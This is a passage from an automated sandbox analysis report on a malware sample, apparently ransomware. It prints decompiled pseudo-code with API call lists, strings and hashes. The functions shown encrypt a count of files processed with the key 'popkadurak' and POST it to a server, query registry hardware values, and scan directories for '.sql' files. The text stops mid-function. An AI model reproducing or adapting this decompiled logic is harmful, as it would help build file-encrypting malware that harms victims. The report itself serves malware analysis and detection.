				if( *((intOrPtr*)(_t24 + 0x60)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x68), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x80)) != 0) {
					return VirtualFree( *(_t24 + 0x84), 0, 0x8000);
				}
				return _t20;
			}

0x0fe67d71
0x0fe67d7d
0x0fe67d89
0x0fe67d89
0x0fe67d8f
0x0fe67d9b
0x0fe67d9b
0x0fe67da1
0x0fe67dad
0x0fe67dad
0x0fe67db3
0x0fe67dbf
0x0fe67dbf
0x0fe67dc5
0x0fe67dd1
0x0fe67dd1
0x0fe67dd7
0x0fe67de3
0x0fe67de3
0x0fe67de9
0x0fe67df5
0x0fe67df5
0x0fe67dfb
0x0fe67e07
0x0fe67e07
0x0fe67e0d
0x0fe67e19
0x0fe67e19
0x0fe67e22
0x00000000
0x0fe67e31
0x0fe67e35

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FE648AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE67D89
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FE648AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE67D9B
VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0FE648AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE67DAD
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FE648AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE67DBF
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FE648AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE67DD1
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FE648AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE67DE3
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FE648AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE67DF5
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FE648AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE67E07
VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0FE648AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE67E19
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FE648AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE67E31

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: c085ba23aead450735bfb9afd643fe408f3a183e729907e584bf2f8f6b4e549c
Instruction ID: 515bc2235a112510ffd46c51caeabc62d265d0cfc90506e1af362303b654bdd8
Opcode Fuzzy Hash: c085ba23aead450735bfb9afd643fe408f3a183e729907e584bf2f8f6b4e549c
Instruction Fuzzy Hash: CC21DD30280B08AAE6761A15DC0AFA6B2A1BB40B89F65593CF2C1244F18FF57499DF04

Uniqueness

Uniqueness Score: -1.00%

Function 0FE67410 Relevance: 7.5, APIs: 5, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FE67410(void* __ecx, void* _a4, int _a8, short* _a12, char* _a16, short* _a20) {
				void* _v8;
				long _t14;
				long _t18;

				_t14 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_v8); // executed
				if(_t14 != 0) {
					return 0;
				} else {
					_a8 = _a20;
					_t18 = RegQueryValueExW(_v8, _a12, 0, 0, _a16,  &_a8); // executed
					if(_t18 != 0) {
						GetLastError();
						RegCloseKey(_v8);
						return 0;
					} else {
						_t11 = _t18 + 1; // 0x1, executed
						RegCloseKey(_v8); // executed
						return _t11;
					}
				}
			}

0x0fe67426
0x0fe67430
0x0fe67484
0x0fe67432
0x0fe67435
0x0fe67447
0x0fe6744f
0x0fe67466
0x0fe6746f
0x0fe6747b
0x0fe67451
0x0fe67454
0x0fe67457
0x0fe67463
0x0fe67463
0x0fe6744f

APIs

RegOpenKeyExW.KERNEL32(?,?,00000000,00020019,?,?,0000060C,?,0FE67885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FE67426
RegQueryValueExW.KERNEL32(?,?,00000000,00000000,00000080,?,?,0FE67885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FE67447
RegCloseKey.KERNEL32(?,?,0FE67885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FE67457
GetLastError.KERNEL32(?,0FE67885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FE67466
RegCloseKey.ADVAPI32(?,?,0FE67885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FE6746F

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Close$ErrorLastOpenQueryValue
String ID:
API String ID: 2437438455-0
Opcode ID: 1ffeb81f014a42bb520258f65561b69be78bef2884f3726033f77d8478a9b76a
Instruction ID: d67b081e9b3cec7b96a8616c8a3ff4e1913452b72062798442cd5b3a5e1e9d2f
Opcode Fuzzy Hash: 1ffeb81f014a42bb520258f65561b69be78bef2884f3726033f77d8478a9b76a
Instruction Fuzzy Hash: 9E012132A0011DFBCB509F95ED09DDB7F79EB057A6B004162FD05E6111D7329A34ABE0

Uniqueness

Uniqueness Score: -1.00%

Function 0FE66550 Relevance: 2.5, APIs: 2, Instructions: 46
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0FE66550(void** __ecx) {
				void** _v8;
				void* _t19;
				void* _t20;
				void* _t24;

				_push(__ecx);
				_v8 = __ecx;
				_t19 = VirtualAlloc(0, 0x123, 0x3000, 4); // executed
				_v8[1] = _t19;
				_t20 = VirtualAlloc(0, 0x515, 0x3000, 4); // executed
				 *_v8 = _t20;
				_v8[3] = 0x123;
				_v8[2] = 0x515;
				_t13 =  &(_v8[1]); // 0xc7000000
				_t24 = E0FE663E0( *_t13,  &(_v8[3]),  *_v8,  &(_v8[2])); // executed
				if(_t24 == 0) {
					_v8[4] = 1;
				}
				_v8[4] = 0;
				return _v8;
			}

0x0fe66553
0x0fe66554
0x0fe66565
0x0fe6656e
0x0fe6657f
0x0fe66588
0x0fe6658d
0x0fe66597
0x0fe665b5
0x0fe665b9
0x0fe665c3
0x0fe665c8
0x0fe665c8
0x0fe665d2
0x0fe665df

APIs

VirtualAlloc.KERNEL32(00000000,00000123,00003000,00000004,?,?,0FE64B9E), ref: 0FE66565
VirtualAlloc.KERNEL32(00000000,00000515,00003000,00000004,?,0FE64B9E), ref: 0FE6657F

Part of subcall function 0FE663E0: CryptAcquireContextW.ADVAPI32(0FE64B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,0FE64B96,?,0FE64B9E), ref: 0FE663F8
Part of subcall function 0FE663E0: GetLastError.KERNEL32(?,0FE64B9E), ref: 0FE66402
Part of subcall function 0FE663E0: CryptAcquireContextW.ADVAPI32(0FE64B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0FE64B9E), ref: 0FE6641E

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: AcquireAllocContextCryptVirtual$ErrorLast
String ID:
API String ID: 3824161113-0
Opcode ID: d6cfdad9543b77fe09fadbd5492688c728569e093da4d436d9493b2d08e1eebd
Instruction ID: 60033e36e286cbea2d4e7d9f02bb43def1d578716869ab6b5119507b1b0b91ae
Opcode Fuzzy Hash: d6cfdad9543b77fe09fadbd5492688c728569e093da4d436d9493b2d08e1eebd
Instruction Fuzzy Hash: D511DBB4A40208EFD704CF84DA55F9AB7F5EF88705F208188E904AB381D7B5EF109B54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0FE653D0 Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 230
stringmemoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E0FE653D0(CHAR* __ecx, CHAR* __edx, void* _a4) {
				int _v8;
				void* _v12;
				CHAR* _v16;
				void* _v20;
				void** _v24;
				void* _v28;
				void* _v32;
				char _v36;
				void* _v84;
				CHAR* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char _v104;
				short _v128;
				void* __esi;
				int _t40;
				BYTE* _t41;
				int _t43;
				void* _t61;
				void* _t65;
				void* _t68;
				void* _t69;
				intOrPtr _t71;
				CHAR* _t80;
				char* _t82;
				CHAR* _t83;
				void* _t84;
				CHAR* _t88;
				int _t96;
				void* _t98;
				void* _t99;
				int _t100;
				void* _t101;
				long _t102;
				BYTE* _t103;
				CHAR* _t105;
				void* _t106;
				void* _t108;

				_t82 = __ecx;
				_v16 = __edx;
				_t40 = lstrlenA(__ecx) + 1;
				_v8 = _t40;
				_t3 = _t40 + 1; // 0x2
				_t102 = _t3;
				_t41 = VirtualAlloc(0, _t102, 0x3000, 0x40);
				_v20 = _t41;
				if(_t41 == 0 || _v8 >= _t102) {
					_t103 = 0;
					__eflags = 0;
				} else {
					_t103 = _t41;
				}
				_t98 = 0;
				_t43 = CryptStringToBinaryA(_t82, 0, 1, _t103,  &_v8, 0, 0);
				_t116 = _t43;
				if(_t43 == 0) {
					GetLastError();
					goto L14;
				} else {
					_t96 = _v8;
					E0FE65F00(_t103, _t96, _t103);
					asm("xorps xmm0, xmm0");
					_t88 =  &_v36;
					asm("movdqu [ebp-0x20], xmm0");
					E0FE633E0(_t88, _t116, _t103);
					if(_v36 != 0) {
						E0FE65350();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(_t82);
						_push(_t103);
						_t83 = _t88;
						_v96 = _t96;
						_push(0);
						_v88 = _t83;
						E0FE67E40( &_v104);
						_v92 = E0FE65220();
						_t99 = 0x400 + lstrlenA(_t83) * 2;
						_t22 = _t99 + 1; // 0x1
						_t84 = VirtualAlloc(0, _t22, 0x3000, 0x40);
						_v84 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
						__eflags = _t84;
						if(_t84 == 0) {
							L20:
							_t105 = 0;
							__eflags = 0;
						} else {
							_t24 = _t99 + 1; // 0x1
							__eflags = _t99 - _t24;
							if(_t99 >= _t24) {
								goto L20;
							} else {
								_t105 = _t84;
							}
						}
						lstrcatA(_t105, _v16);
						asm("movdqu xmm0, [0xfe6fb40]");
						asm("movdqu [ebp-0x78], xmm0");
						asm("movdqu xmm0, [0xfe6fb50]");
						asm("movdqu [ebp-0x68], xmm0");
						asm("movdqu xmm0, [0xfe6fb60]");
						asm("movdqu [ebp-0x58], xmm0");
						asm("movdqu xmm0, [0xfe6fb70]");
						asm("movdqu [ebp-0x48], xmm0");
						asm("movdqu xmm0, [0xfe6fb80]");
						asm("movdqu [ebp-0x38], xmm0");
						asm("movdqu xmm0, [0xfe6fb90]");
						asm("movdqu [ebp-0x28], xmm0");
						lstrlenA(_t105);
						_t100 = 0;
						_push(lstrlenW( &_v128));
						_push( &_v128);
						_push(L"POST");
						_push(0x31fff);
						_push(_v12);
						_push(lstrlenA(_t105));
						_push(_t105);
						_t106 = _v20;
						_push(L"popkadurak");
						_push(_t106);
						_t61 = E0FE68050( &_v32);
						__eflags = _t61;
						if(_t61 != 0) {
							__eflags = _a4;
							_t100 = 1;
							if(_a4 != 0) {
								_v16 = 0;
								_t68 = E0FE653D0(_v12,  &_v16);
								__eflags = _t68;
								if(_t68 == 0) {
									_t100 = 0;
									__eflags = 0;
								} else {
									_t69 = _v16;
									__eflags = _t69;
									if(_t69 != 0) {
										 *_v24 = _t69;
									}
								}
							}
						}
						VirtualFree(_t106, 0, 0x8000);
						VirtualFree(_v12, 0, 0x8000);
						VirtualFree(_t84, 0, 0x8000);
						_t65 = _v28;
						__eflags = _t65;
						if(_t65 != 0) {
							InternetCloseHandle(_t65);
						}
						return _t100;
					} else {
						_t101 = _v32;
						_t71 =  *0xfe72a60; // 0x0
						_t108 = _v28;
						_t72 =  !=  ? 0 : _t71;
						_v12 = 1;
						 *0xfe72a60 =  !=  ? 0 : _t71;
						if(_t108 != 0) {
							_t80 = VirtualAlloc(0, lstrlenA(_t108) + 1, 0x3000, 4);
							 *_v16 = _t80;
							if(_t80 != 0) {
								lstrcpyA(_t80, _t108);
							}
						}
						_t73 = GetProcessHeap;
						if(_t101 != 0) {
							HeapFree(GetProcessHeap(), 0, _t101);
							_t73 = GetProcessHeap;
						}
						if(_t108 != 0) {
							HeapFree( *_t73(), 0, _t108);
						}
						_t98 = _v12;
						L14:
						VirtualFree(_v20, 0, 0x8000);
						return _t98;
					}
				}
			}

0x0fe653d9
0x0fe653db
0x0fe653e5
0x0fe653ed
0x0fe653f0
0x0fe653f0
0x0fe653f6
0x0fe653fc
0x0fe65401
0x0fe6540c
0x0fe6540c
0x0fe65408
0x0fe65408
0x0fe65408
0x0fe6540e
0x0fe6541b
0x0fe65421
0x0fe65423
0x0fe654dc
0x00000000
0x0fe65429
0x0fe65429
0x0fe6542e
0x0fe65433
0x0fe65436
0x0fe6543a
0x0fe6543f
0x0fe65447
0x0fe654e4
0x0fe654e9
0x0fe654ea
0x0fe654eb
0x0fe654ec
0x0fe654ed
0x0fe654ee
0x0fe654ef
0x0fe654f6
0x0fe654f7
0x0fe654f8
0x0fe654fa
0x0fe654fd
0x0fe65501
0x0fe65504
0x0fe6550f
0x0fe65525
0x0fe6552c
0x0fe65542
0x0fe65546
0x0fe65549
0x0fe6554b
0x0fe65558
0x0fe65558
0x0fe65558
0x0fe6554d
0x0fe6554d
0x0fe65550
0x0fe65552
0x00000000
0x0fe65554
0x0fe65554
0x0fe65554
0x0fe65552
0x0fe6555e
0x0fe65564
0x0fe6556d
0x0fe65572
0x0fe6557a
0x0fe6557f
0x0fe65587
0x0fe6558c
0x0fe65594
0x0fe65599
0x0fe655a1
0x0fe655a6
0x0fe655ae
0x0fe655b3
0x0fe655bc
0x0fe655c5
0x0fe655c9
0x0fe655ca
0x0fe655d2
0x0fe655d7
0x0fe655e1
0x0fe655e2
0x0fe655e3
0x0fe655e9
0x0fe655ee
0x0fe655ef
0x0fe655f4
0x0fe655f6
0x0fe655f8
0x0fe655fc
0x0fe65601
0x0fe65609
0x0fe65610
0x0fe65615
0x0fe65617
0x0fe65627
0x0fe65627
0x0fe65619
0x0fe65619
0x0fe6561c
0x0fe6561e
0x0fe65623
0x0fe65623
0x0fe6561e
0x0fe65617
0x0fe65601
0x0fe65637
0x0fe65643
0x0fe6564d
0x0fe6564f
0x0fe65652
0x0fe65654
0x0fe65657
0x0fe65657
0x0fe65665
0x0fe6544d
0x0fe6544d
0x0fe65452
0x0fe65459
0x0fe6545c
0x0fe6545f
0x0fe65466
0x0fe6546d
0x0fe65481
0x0fe6548a
0x0fe6548e
0x0fe65492
0x0fe65492
0x0fe6548e
0x0fe6549e
0x0fe654a5
0x0fe654ad
0x0fe654af
0x0fe654af
0x0fe654b6
0x0fe654be
0x0fe654be
0x0fe654c0
0x0fe654c3
0x0fe654cd
0x0fe654db
0x0fe654db
0x0fe65447

APIs

lstrlenA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,0FE65615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FE653DF
VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040,?,?,?,?,0FE65615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FE653F6
CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0FE6541B
lstrlenA.KERNEL32(?,00003000,00000004,00000000,?,?,?,?,0FE65615,00000000,popkadurak), ref: 0FE65477
VirtualAlloc.KERNEL32(00000000,00000001,?,?,?,?,0FE65615,00000000,popkadurak), ref: 0FE65481
lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0FE65615,00000000,popkadurak), ref: 0FE65492
HeapFree.KERNEL32(00000000,?,?,?,?,0FE65615,00000000,popkadurak), ref: 0FE654AD
HeapFree.KERNEL32(00000000,?,?,?,?,0FE65615,00000000,popkadurak), ref: 0FE654BE
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,0FE65615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FE654CD
GetLastError.KERNEL32(?,?,?,?,0FE65615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FE654DC
lstrlenA.KERNEL32(00000000,00000000,00000000,74716980), ref: 0FE65512
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0FE65532
VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 0FE65544
lstrcatA.KERNEL32(00000000,?), ref: 0FE6555E
lstrlenA.KERNEL32(00000000), ref: 0FE655B3
lstrlenW.KERNEL32(?), ref: 0FE655BF
lstrlenA.KERNEL32(00000000,00000000,00031FFF,?,00000000), ref: 0FE655DB
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FE65637
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0FE65643
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0FE6564D
InternetCloseHandle.WININET(0FE6581B), ref: 0FE65657

Strings

POST, xrefs: 0FE655CA
popkadurak, xrefs: 0FE655E9

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Virtual$Freelstrlen$Alloc$Heap$BinaryCloseCryptErrorHandleInternetLastStringlstrcatlstrcpy
String ID: POST$popkadurak
API String ID: 1287001821-2707760125
Opcode ID: 7ac14ff635837346fb44cd8f08c0d60cf87b88dfeffb64b48621e823c446a904
Instruction ID: 535a7b344d7fe086358931880389d0ccd3dd37e984a31070855d7b1bccb2dcf9
Opcode Fuzzy Hash: 7ac14ff635837346fb44cd8f08c0d60cf87b88dfeffb64b48621e823c446a904
Instruction Fuzzy Hash: 0C71D371E4030DABDB109FA69C44FEFBB78EF89B96F141125EA05B3241DB789940CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0FE65670 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 169
stringmemoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0FE65670(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				void* _v12;
				int _v16;
				void* _v20;
				char _v164;
				void* __esi;
				BYTE* _t33;
				int _t41;
				CHAR* _t44;
				int _t52;
				void* _t53;
				char _t60;
				BYTE* _t65;
				char* _t69;
				signed int _t70;
				void* _t75;
				signed int _t78;
				CHAR* _t85;
				int _t87;
				long _t88;
				void* _t89;
				void* _t91;
				void* _t94;

				_t82 = __edx;
				_t70 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t33 = VirtualAlloc(0, 0x4c02, 0x3000, 0x40);
				_v20 = _t33;
				if(_t33 == 0) {
					_t65 = 0;
					_t85 = 0;
				} else {
					_t4 =  &(_t33[0x800]); // 0x800
					_t85 = _t4;
					_t65 = _t33;
				}
				_push(_v12);
				wsprintfW(_t65, L"action=result&e_files=%d&e_size=%I64u&e_time=%d&", _v8, _a4, _a8);
				_push(0);
				_push(_t70);
				_push(0);
				_push(0);
				_push(_t70);
				_push(0);
				_push(_t70);
				_push(0);
				_push(_t70);
				_push(0);
				_push(_t70);
				_push(0);
				_t94 = _t91 + 0x14;
				_push(0);
				_push(_t70);
				_push(0);
				E0FE63BC0( &_v164);
				E0FE67490( &_v164, _t82);
				E0FE672A0( &_v164);
				E0FE670A0( &_v164, _t65 + lstrlenW(_t65) * 2);
				_t41 = lstrlenW(_t65);
				_t75 =  *0xfe72a78; // 0x0
				_v8 = _t41;
				if(_t75 != 0) {
					VirtualFree(_t75, 0, 0x8000);
				}
				_t44 = VirtualAlloc(0, lstrlenW(L"popkadurak") + 2, 0x3000, 4);
				 *0xfe72a78 = _t44;
				if(_t44 != 0) {
					wsprintfA(_t44, "%S", L"popkadurak");
					_t94 = _t94 + 0xc;
				}
				_t87 = _v8 + _v8;
				E0FE65F00(_t65, _t87, _t87);
				_v16 = _v8 * 8;
				if(CryptBinaryToStringA(_t65, _t87, 0x40000001, _t85,  &_v16) == 0) {
					GetLastError();
				}
				_t22 = lstrlenA(_t85) + 4; // 0x4
				_t88 = _t22;
				_v12 = VirtualAlloc(0, _t88, 0x3000, 0x40);
				_t52 = lstrlenA(_t85);
				_t78 = _v12;
				_t53 = _t52 + 2;
				if(_t78 == 0) {
					L11:
					_v8 = 0;
				} else {
					_v8 = _t78;
					if(_t53 >= _t88) {
						goto L11;
					}
				}
				_t89 = 0;
				if(lstrlenA(_t85) != 0) {
					_t69 = _v8;
					do {
						_t60 =  *((intOrPtr*)(_t89 + _t85));
						if(_t60 != 0xa && _t60 != 0xd) {
							 *_t69 = _t60;
							_t69 = _t69 + 1;
						}
						_t89 = _t89 + 1;
					} while (_t89 < lstrlenA(_t85));
				}
				E0FE654F0(_v8, 0, _t78, 0);
				_t68 =  !=  ? 1 : 0;
				VirtualFree(_v12, 0, 0x8000);
				E0FE67D70( &_v164);
				VirtualFree(_v20, 0, 0x8000);
				_t59 =  !=  ? 1 : 0;
				return  !=  ? 1 : 0;
			}

0x0fe65670
0x0fe65670
0x0fe65690
0x0fe65693
0x0fe65696
0x0fe65698
0x0fe6569d
0x0fe656a9
0x0fe656ab
0x0fe6569f
0x0fe6569f
0x0fe6569f
0x0fe656a5
0x0fe656a5
0x0fe656ad
0x0fe656bf
0x0fe656c8
0x0fe656ca
0x0fe656cb
0x0fe656d0
0x0fe656d2
0x0fe656d3
0x0fe656d5
0x0fe656d6
0x0fe656d8
0x0fe656d9
0x0fe656db
0x0fe656dc
0x0fe656de
0x0fe656e1
0x0fe656e3
0x0fe656e4
0x0fe656ec
0x0fe656f7
0x0fe65702
0x0fe65718
0x0fe6571e
0x0fe65724
0x0fe6572a
0x0fe6572f
0x0fe65739
0x0fe65739
0x0fe65757
0x0fe65759
0x0fe65760
0x0fe6576d
0x0fe65773
0x0fe65773
0x0fe6577b
0x0fe65780
0x0fe6578f
0x0fe657a6
0x0fe657a8
0x0fe657a8
0x0fe657be
0x0fe657be
0x0fe657cb
0x0fe657ce
0x0fe657d0
0x0fe657d3
0x0fe657d8
0x0fe657e1
0x0fe657e1
0x0fe657da
0x0fe657da
0x0fe657df
0x00000000
0x00000000
0x0fe657df
0x0fe657e9
0x0fe657ef
0x0fe657f1
0x0fe657f4
0x0fe657f4
0x0fe657f9
0x0fe657ff
0x0fe65801
0x0fe65801
0x0fe65803
0x0fe6580a
0x0fe657f4
0x0fe65816
0x0fe65830
0x0fe6583d
0x0fe65845
0x0fe65854
0x0fe65858
0x0fe6585e

APIs

VirtualAlloc.KERNEL32(00000000,00004C02,00003000,00000040,?,00000000,?), ref: 0FE65696
wsprintfW.USER32 ref: 0FE656BF
lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0FE65708
lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0FE6571E
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0FE65739
lstrlenW.KERNEL32(popkadurak,00003000,00000004,?,00000000,00000000,?,00000000), ref: 0FE6574B
VirtualAlloc.KERNEL32(00000000,-00000002,?,00000000,00000000,?,00000000), ref: 0FE65757
wsprintfA.USER32 ref: 0FE6576D
CryptBinaryToStringA.CRYPT32(00000000,747166A0,40000001,00000000,?), ref: 0FE6579E
GetLastError.KERNEL32(?,00000000,00000000,?,00000000), ref: 0FE657A8
lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0FE657B5
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000040,?,00000000,00000000,?,00000000), ref: 0FE657C4
lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0FE657CE
lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0FE657EB
lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0FE65804
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0FE6583D
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0FE65854

Strings

action=result&e_files=%d&e_size=%I64u&e_time=%d&, xrefs: 0FE656B9
popkadurak, xrefs: 0FE65746, 0FE65762

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$AllocFree$wsprintf$BinaryCryptErrorLastString
String ID: action=result&e_files=%d&e_size=%I64u&e_time=%d&$popkadurak
API String ID: 823394411-2102589890
Opcode ID: f9f6c222957385a5d240d01f5b2d0b38e992868aff8e4ba994e8ad155fb68b14
Instruction ID: be8cc078789ba3c1dc944dfdbc5d26479183033deee5385b41accaf49e47b1a6
Opcode Fuzzy Hash: f9f6c222957385a5d240d01f5b2d0b38e992868aff8e4ba994e8ad155fb68b14
Instruction Fuzzy Hash: CA51D470B8030CBFEB209B65DC46FAF7B79EF45B85F540069F601B6181DAB8AA10CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0FE66BA0 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 136
stringfilememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FE66BA0(WCHAR* __ecx) {
				void* _v8;
				void* _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				long _v24;
				struct _WIN32_FIND_DATAW _v620;
				int _t38;
				struct _SECURITY_ATTRIBUTES* _t40;
				int _t50;
				WCHAR* _t52;
				intOrPtr _t53;
				void* _t54;
				WCHAR* _t57;
				long _t64;
				WCHAR* _t66;
				void* _t67;

				_t66 = __ecx;
				_v16 = __ecx;
				_t52 =  &(_t66[lstrlenW(__ecx)]);
				_v20 = _t52;
				lstrcatW(_t66, "*");
				_v8 = FindFirstFileW(_t66,  &_v620);
				 *_t52 = 0;
				_t53 = 0;
				do {
					if(lstrcmpW( &(_v620.cFileName), ".") == 0 || lstrcmpW( &(_v620.cFileName), L"..") == 0) {
						goto L20;
					} else {
						lstrcatW(_t66,  &(_v620.cFileName));
						_t38 = lstrlenW(_t66);
						_t10 = _t38 - 1; // -1
						_t57 =  &(_t66[_t10]);
						if(_t38 == 0) {
							L18:
							_t53 = 0;
							goto L19;
						} else {
							while( *_t57 != 0x2e) {
								_t57 = _t57 - 2;
								_t38 = _t38 - 1;
								if(_t38 != 0) {
									continue;
								}
								break;
							}
							if(_t38 == 0) {
								goto L18;
							} else {
								_t40 = lstrcmpW(_t57, L".sql");
								if(_t40 != 0) {
									goto L18;
								} else {
